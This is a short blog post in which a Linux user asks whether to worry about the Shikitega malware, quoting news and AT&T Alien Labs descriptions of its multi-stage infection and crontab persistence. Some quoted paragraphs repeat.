As a Linux user should I be concerned? Sounds quite scary and sophisticated!
Until know, I thought that Linux was much less vulnerable than Windows especially when you operate Linux primarily in user mode only!
The article is unfortunately kind of unspecific about what Linux installations are exactly affected:
1) Administrator mode v. user mode
2) Server vs. desktop
2) Server vs. desktop
So much for sloppy journalism although ZDNET is a technology oriented publication.
"A stealthy new form of malware is targeting Linux systems in attacks that can take full control of infected devices – and it is using this access to install crypto-mining malware.
Dubbed Shikitega, the malware targets endpoints and Internet of Things devices that run on Linux operating systems and has been detailed by cybersecurity researchers at AT&T Alien Labs. ...
The malware is delivered in a multi-stage infection chain, where each module responds to commands from the previous part of the payload and downloads and executes the next one.
By downloading the payload bit by bit – starting with a module that is just a few hundred bytes – Shikitega can avoid being uncovered by anti-virus software. It also uses a polymorphic encoder to make it more difficult to detect. ...
The initial method of infection is still unknown, but the malware gradually downloads more and more modules to provide full functionality, starting with the initial dropper, then going through several stages – including downloading Mettle, a Metasploit offensive security tool, which allows the attacker to deploy a wide range of attacks. ..."
The malware is delivered in a multi-stage infection chain, where each module responds to commands from the previous part of the payload and downloads and executes the next one.
By downloading the payload bit by bit – starting with a module that is just a few hundred bytes – Shikitega can avoid being uncovered by anti-virus software. It also uses a polymorphic encoder to make it more difficult to detect. ...
The initial method of infection is still unknown, but the malware gradually downloads more and more modules to provide full functionality, starting with the initial dropper, then going through several stages – including downloading Mettle, a Metasploit offensive security tool, which allows the attacker to deploy a wide range of attacks. ..."
From the AT&T cybersecurity blog:
"... With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. ...
To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the current logged in user and the other two for the user root. ..."
To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the current logged in user and the other two for the user root. ..."
No comments:
Post a Comment